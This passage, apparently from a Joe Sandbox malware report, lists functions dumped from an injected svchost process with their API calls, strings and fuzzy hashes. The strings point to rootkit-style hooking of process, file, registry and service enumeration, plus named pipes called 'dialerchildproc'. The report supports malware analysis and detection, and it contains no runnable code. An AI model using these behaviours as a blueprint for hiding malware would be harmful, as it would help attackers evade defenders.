Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: CB516D7A216B44D3EB14DFB2E54839AB3B1F789B89F04C124DA8957B19EF38C159CB40

Function 00000282B8DA12C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000282B8DA1326
GetProcessHeap.KERNEL32 ref: 00000282B8DA1334
HeapAlloc.KERNEL32 ref: 00000282B8DA1345
RegEnumValueW.ADVAPI32 ref: 00000282B8DA13A1

Part of subcall function 00000282B8DA1554: StrCmpIW.SHLWAPI ref: 00000282B8DA1585

GetProcessHeap.KERNEL32 ref: 00000282B8DA13E9
HeapAlloc.KERNEL32 ref: 00000282B8DA13F7
GetProcessHeap.KERNEL32 ref: 00000282B8DA141B
HeapFree.KERNEL32 ref: 00000282B8DA1429
lstrlenW.KERNEL32 ref: 00000282B8DA1432
GetProcessHeap.KERNEL32 ref: 00000282B8DA1440
HeapAlloc.KERNEL32 ref: 00000282B8DA144E
StrCpyW.SHLWAPI ref: 00000282B8DA1470
GetProcessHeap.KERNEL32 ref: 00000282B8DA1485
HeapFree.KERNEL32 ref: 00000282B8DA1493

Strings

d, xrefs: 00000282B8DA1365

Memory Dump Source

Source File: 00000022.00000002.2666614413.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8da0000_svchost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: 4ca3c504c8302ac8ba4f4ba6754127589a0304b5c3dcc9e66443989350c34a44
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: 74516A7A606B85D3EB14CF66E54839AB3A5F788BC8F148126DB5E07B14DF38D069CB00

Function 00000282B9341EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 00000282B9341EBF

Part of subcall function 00000282B9342174: GetModuleHandleA.KERNEL32 ref: 00000282B934218C
Part of subcall function 00000282B9342174: GetProcAddress.KERNEL32 ref: 00000282B934219D

Part of subcall function 00000282B9345C10: GetCurrentThreadId.KERNEL32 ref: 00000282B9345C4B

Strings

NtQueryDirectoryFileEx, xrefs: 00000282B9341F3C
ntdll.dll, xrefs: 00000282B9341ECD
NtEnumerateValueKey, xrefs: 00000282B9341F76
NtQueryDirectoryFile, xrefs: 00000282B9341F1F
NtResumeThread, xrefs: 00000282B9341F02
NtEnumerateKey, xrefs: 00000282B9341F59
sechost.dll, xrefs: 00000282B9341FD9
NtDeviceIoControlFile, xrefs: 00000282B9341FF6
EnumServiceGroupW, xrefs: 00000282B9341F90
advapi32.dll, xrefs: 00000282B9341F97, 00000282B9341FB8
NtQuerySystemInformation, xrefs: 00000282B9341EE5
EnumServicesStatusExW, xrefs: 00000282B9341FB1, 00000282B9341FD2

Memory Dump Source

Source File: 00000022.00000002.2667466358.00000282B9340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B9340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b9340000_svchost.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: a877d73722e01143f1ce56bb996662a40ac6cd6d669fda527799fc8fa258c6a0
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: 6E31A27C11394AE1EE14EFB4E8997D42721BB8934EFCAC413D51972266BE38C64DD380

Function 00000282B8DA1EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 00000282B8DA1EBF

Part of subcall function 00000282B8DA2174: GetModuleHandleA.KERNEL32 ref: 00000282B8DA218C
Part of subcall function 00000282B8DA2174: GetProcAddress.KERNEL32 ref: 00000282B8DA219D

Part of subcall function 00000282B8DA5C10: GetCurrentThreadId.KERNEL32 ref: 00000282B8DA5C4B

Strings

ntdll.dll, xrefs: 00000282B8DA1ECD
sechost.dll, xrefs: 00000282B8DA1FD9
NtQuerySystemInformation, xrefs: 00000282B8DA1EE5
NtEnumerateKey, xrefs: 00000282B8DA1F59
NtEnumerateValueKey, xrefs: 00000282B8DA1F76
advapi32.dll, xrefs: 00000282B8DA1F97, 00000282B8DA1FB8
NtQueryDirectoryFile, xrefs: 00000282B8DA1F1F
NtDeviceIoControlFile, xrefs: 00000282B8DA1FF6
NtResumeThread, xrefs: 00000282B8DA1F02
EnumServicesStatusExW, xrefs: 00000282B8DA1FB1, 00000282B8DA1FD2
EnumServiceGroupW, xrefs: 00000282B8DA1F90
NtQueryDirectoryFileEx, xrefs: 00000282B8DA1F3C

Memory Dump Source

Source File: 00000022.00000002.2666614413.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8da0000_svchost.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: 1a19791b9f9a41d9f5801778b675b8c68d3a2ffdc40f35bf97b0fc8ef4732248
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: 5C316D7C203ACBE0EA04EFB6E8597D42321A7543CCFD0D5279A2E13D659E38864DD790

Function 00000282B93423F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 00000282B9342405
GetCurrentProcessId.KERNEL32 ref: 00000282B934240F

Part of subcall function 00000282B93419AC: OpenProcess.KERNEL32 ref: 00000282B93419CA
Part of subcall function 00000282B93419AC: IsWow64Process.KERNEL32 ref: 00000282B93419E0
Part of subcall function 00000282B93419AC: CloseHandle.KERNEL32 ref: 00000282B93419FB

CreateFileW.KERNEL32 ref: 00000282B9342468
WriteFile.KERNEL32 ref: 00000282B9342490
ReadFile.KERNEL32 ref: 00000282B93424AF
CloseHandle.KERNEL32 ref: 00000282B93424B8

Strings

\\.\pipe\dialerchildproc32, xrefs: 00000282B934243F
\\.\pipe\dialerchildproc64, xrefs: 00000282B9342438

Memory Dump Source

Source File: 00000022.00000002.2667466358.00000282B9340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B9340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b9340000_svchost.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: ddc6dfb73f3ae3822ab696dacc1674eb48d4d8d2a405820aa88491a06ed678da
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: 4A21413A616B40C3F710DB35E44835A77A0F389BA9F548215EA5957BA9EF3CC14DCB40

Function 00000282B8DA23F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 00000282B8DA2405
GetCurrentProcessId.KERNEL32 ref: 00000282B8DA240F

Part of subcall function 00000282B8DA19AC: OpenProcess.KERNEL32 ref: 00000282B8DA19CA
Part of subcall function 00000282B8DA19AC: IsWow64Process.KERNEL32 ref: 00000282B8DA19E0
Part of subcall function 00000282B8DA19AC: CloseHandle.KERNEL32 ref: 00000282B8DA19FB

CreateFileW.KERNEL32 ref: 00000282B8DA2468
WriteFile.KERNEL32 ref: 00000282B8DA2490
ReadFile.KERNEL32 ref: 00000282B8DA24AF
CloseHandle.KERNEL32 ref: 00000282B8DA24B8

Strings

\\.\pipe\dialerchildproc32, xrefs: 00000282B8DA243F
\\.\pipe\dialerchildproc64, xrefs: 00000282B8DA2438

Memory Dump Source

Source File: 00000022.00000002.2666614413.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8da0000_svchost.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: b803b4e353c5cfd4c3213c39b59362cf8bf12efcb7962108a0072a29977e4a16
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: E6213039616682D2E7148B35E44875963A0F789BE8F508216EA5D02FA8CF7CC14DCB00

Function 00000282B934104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000282B93410AB
RegEnumValueW.ADVAPI32 ref: 00000282B934110E
GetProcessHeap.KERNEL32 ref: 00000282B9341155
HeapAlloc.KERNEL32 ref: 00000282B9341163
GetProcessHeap.KERNEL32 ref: 00000282B9341187
HeapFree.KERNEL32 ref: 00000282B9341195

Strings

d, xrefs: 00000282B93410CE

Memory Dump Source

Source File: 00000022.00000002.2667466358.00000282B9340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B9340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b9340000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: a219bddeb8bb51bca0d4cdf772191a54a8e4e3c417c3a292022e9fd499377db7
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: 6C417137216B80D7E7648F61E4497AEB7A1F389B89F04C125DB8957B58EF38D168CB00

Function 00000282B8DA104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000282B8DA10AB
RegEnumValueW.ADVAPI32 ref: 00000282B8DA110E
GetProcessHeap.KERNEL32 ref: 00000282B8DA1155
HeapAlloc.KERNEL32 ref: 00000282B8DA1163
GetProcessHeap.KERNEL32 ref: 00000282B8DA1187
HeapFree.KERNEL32 ref: 00000282B8DA1195

Strings

d, xrefs: 00000282B8DA10CE

Memory Dump Source

Source File: 00000022.00000002.2666614413.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8da0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: 0e7379684b195fc201ac74281aa7fe16fc11cad5d9aaaec3ac3a288316156f3c
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: 43416F77216BC5D7EB648F61E44879AB7A5F388BC8F108126DB9907B58DF38D168CB00

Function 00000282B93475F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000282B9347618
__scrt_acquire_startup_lock.LIBCMT ref: 00000282B934766A
_RTC_Initialize.LIBCMT ref: 00000282B9347698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000282B93476BE
__scrt_release_startup_lock.LIBCMT ref: 00000282B93476E9

Memory Dump Source

Source File: 00000022.00000002.2667466358.00000282B9340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B9340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b9340000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: ac0ce43313d04b9dfef551c501c2d4cfe0c6c0f44d30235a9aba62b4c029f103
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: E481C13C703241C6FA50AB7998493A927D1AB4778AF4EC425DA06B77B7FE38C84D8711

Function 00000282B8DA75F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000282B8DA7618
__scrt_acquire_startup_lock.LIBCMT ref: 00000282B8DA766A
_RTC_Initialize.LIBCMT ref: 00000282B8DA7698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000282B8DA76BE
__scrt_release_startup_lock.LIBCMT ref: 00000282B8DA76E9

Memory Dump Source

Source File: 00000022.00000002.2666614413.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8da0000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 8f9ea54e1a30abed0bd4235fae5f6e3579270667a3f0438116014304a7115940
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 1F818139B076C3C6F654AB36984936963D0AB457D8F28C4279BAD87F96DF38C84D8700

Function 00000282B8D769F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000282B8D76A18
__scrt_acquire_startup_lock.LIBCMT ref: 00000282B8D76A6A
_RTC_Initialize.LIBCMT ref: 00000282B8D76A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000282B8D76ABE
__scrt_release_startup_lock.LIBCMT ref: 00000282B8D76AE9

Memory Dump Source

Source File: 00000022.00000002.2666248495.00000282B8D70000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8D70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8d70000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: cf42b5efd2c2da0368ae510427a58ea06138654b451179e4b8994223b0ef23b7
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 41818E3D6132C3C6FA54AB36E84939967A1E745BC8F54C427AA1D43F96EE38C94DC700

Function 00000282B9349804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 00000282B9349889
GetLastError.KERNEL32 ref: 00000282B9349897
LoadLibraryExW.KERNEL32 ref: 00000282B93498C1
FreeLibrary.KERNEL32 ref: 00000282B9349907
GetProcAddress.KERNEL32 ref: 00000282B9349913

Strings

api-ms-, xrefs: 00000282B93498A9

Memory Dump Source

Source File: 00000022.00000002.2667466358.00000282B9340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B9340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b9340000_svchost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: ab27e7a2a19e3c2c21d38a37eb60456a4706ba6928e517b85606e04055edc8c0
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: 0831C539303750D5EE129B26A8587996394B70AFAAF1F8524DD2E6B386FF38C44D8301

Function 00000282B8DA9804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 00000282B8DA9889
GetLastError.KERNEL32 ref: 00000282B8DA9897
LoadLibraryExW.KERNEL32 ref: 00000282B8DA98C1
FreeLibrary.KERNEL32 ref: 00000282B8DA9907
GetProcAddress.KERNEL32 ref: 00000282B8DA9913

Strings

api-ms-, xrefs: 00000282B8DA98A9

Memory Dump Source

Source File: 00000022.00000002.2666614413.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8da0000_svchost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: 941bce372b336ba866f3fee9688561e8afeee3d6e4ff7cd02d96d7e444983462
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: 8731A439213AD2F1FE159B36A84879963D4BB08BE8F298526DE3D47B84DF38C44D8300

Function 00000282B9351B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00000282B9351BCD
GetLastError.KERNEL32 ref: 00000282B9351BD9
CloseHandle.KERNEL32 ref: 00000282B9351BF1
CreateFileW.KERNEL32 ref: 00000282B9351C1C
WriteConsoleW.KERNEL32 ref: 00000282B9351C3B

Strings

CONOUT$, xrefs: 00000282B9351BFD

Memory Dump Source

Source File: 00000022.00000002.2667466358.00000282B9340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B9340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b9340000_svchost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: f935695f8906ab83612c868772695a4d4e78efeaeb27b83270478d3dfbaf33c9
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: 4E118235316B40C7E7509B66E85831973A0F78CFEAF448214EA5E97799EF78C5488740

Function 00000282B8DB1B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00000282B8DB1BCD
GetLastError.KERNEL32 ref: 00000282B8DB1BD9
CloseHandle.KERNEL32 ref: 00000282B8DB1BF1
CreateFileW.KERNEL32 ref: 00000282B8DB1C1C
WriteConsoleW.KERNEL32 ref: 00000282B8DB1C3B

Strings

CONOUT$, xrefs: 00000282B8DB1BFD

Memory Dump Source

Source File: 00000022.00000002.2666614413.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8da0000_svchost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: 03f29eb814abf513bdf4a1ec71a71f1f0904e7a959271c51ae3a228a2df1c093
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: 9511BF35316BD1C6FB508F62E848319B3A4F788FE8F008226EA5D87B94DF38C9088744

Function 00000282B9345C10 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000282B9345C4B
GetThreadContext.KERNEL32 ref: 00000282B9345DB5

Part of subcall function 00000282B9345A40: GetCurrentThreadId.KERNEL32 ref: 00000282B9345A44

Memory Dump Source

Source File: 00000022.00000002.2667466358.00000282B9340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B9340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b9340000_svchost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction ID: 18a92cadc35be9f161f10b3f5713b4efa73d99a4c311e14ef224a0ee89bcb9f6
Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction Fuzzy Hash: 82D1CF7A60AB88C2DA70DB29E49835A77A0F3CDB89F154112EACD57BA5DF3CC545CB00

Function 00000282B8DA5C10 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000282B8DA5C4B
GetThreadContext.KERNEL32 ref: 00000282B8DA5DB5

Part of subcall function 00000282B8DA5A40: GetCurrentThreadId.KERNEL32 ref: 00000282B8DA5A44

Memory Dump Source

Source File: 00000022.00000002.2666614413.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8da0000_svchost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction ID: 52fc862e0764a395fbe96bdfdb4ec01183e03bca5f94b92c6302e4d4bb43ce94
Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction Fuzzy Hash: F9D1AB7A20AB89C5DA709B6AE49835A77B0F3C8BC8F104116EADD47BA5DF39C545CF00

Function 00000282B93430B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000282B93430D7
HeapAlloc.KERNEL32 ref: 00000282B93430EA
StrCmpNIW.SHLWAPI ref: 00000282B934316B
GetProcessHeap.KERNEL32 ref: 00000282B93431D1
HeapFree.KERNEL32 ref: 00000282B93431DF

Strings

dialer, xrefs: 00000282B9343164

Memory Dump Source

Source File: 00000022.00000002.2667466358.00000282B9340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B9340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b9340000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: 51b2e8ad71f9239498b7584ff6f1966a2ca24dec75edfc60d3d5701389611b89
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: FC318239703B51D3EB15AF76A94836963A0FB45B8AF09C020DE4967B59FF38C4A9C700

Function 00000282B8DA30B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000282B8DA30D7
HeapAlloc.KERNEL32 ref: 00000282B8DA30EA
StrCmpNIW.SHLWAPI ref: 00000282B8DA316B
GetProcessHeap.KERNEL32 ref: 00000282B8DA31D1
HeapFree.KERNEL32 ref: 00000282B8DA31DF

Strings

dialer, xrefs: 00000282B8DA3164

Memory Dump Source

Source File: 00000022.00000002.2666614413.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8da0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: 59b6918e19af0f7f89238fee5865eca9660378b8e6b7fcdd28f982da825783b8
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: E131B339703B96C2EB59DF66A80836963A1FB44BC8F14C0269F5C07F54EF38C4A98700

Function 00000282B9341A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 00000282B9341A3A
K32GetModuleFileNameExW.KERNEL32 ref: 00000282B9341A58
PathFindFileNameW.SHLWAPI ref: 00000282B9341A67
lstrlenW.KERNEL32 ref: 00000282B9341A73
StrCpyW.SHLWAPI ref: 00000282B9341A86
CloseHandle.KERNEL32 ref: 00000282B9341A94

Memory Dump Source

Source File: 00000022.00000002.2667466358.00000282B9340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B9340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b9340000_svchost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: ce9cbcd72fc10abd2ad55c1563934f230d337d9980c29c7b0c834b10f39a472e
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: 92015B35302A41D6EA10DB62E45C35963A1F788FCAF48C435CE8993755EE38C9898700

Function 00000282B8DA1A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 00000282B8DA1A3A
K32GetModuleFileNameExW.KERNEL32 ref: 00000282B8DA1A58
PathFindFileNameW.SHLWAPI ref: 00000282B8DA1A67
lstrlenW.KERNEL32 ref: 00000282B8DA1A73
StrCpyW.SHLWAPI ref: 00000282B8DA1A86
CloseHandle.KERNEL32 ref: 00000282B8DA1A94

Memory Dump Source

Source File: 00000022.00000002.2666614413.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8da0000_svchost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: 5f35cf24225b9790f11cc866016af2af5941fcca0731e040f004e315c82cb5f3
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: 9A016D35302B82D6EB14DB22A45C75963A5F788FC8F588036CE9E43B54DE3CC98A8700

Function 00000282B93437AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00000282B93437C8
GetCurrentProcess.KERNEL32 ref: 00000282B93437D6
VirtualProtectEx.KERNEL32 ref: 00000282B93437F8
GetCurrentProcess.KERNEL32 ref: 00000282B9343819
VirtualProtectEx.KERNEL32 ref: 00000282B934383A
TerminateThread.KERNEL32 ref: 00000282B9343849

Memory Dump Source

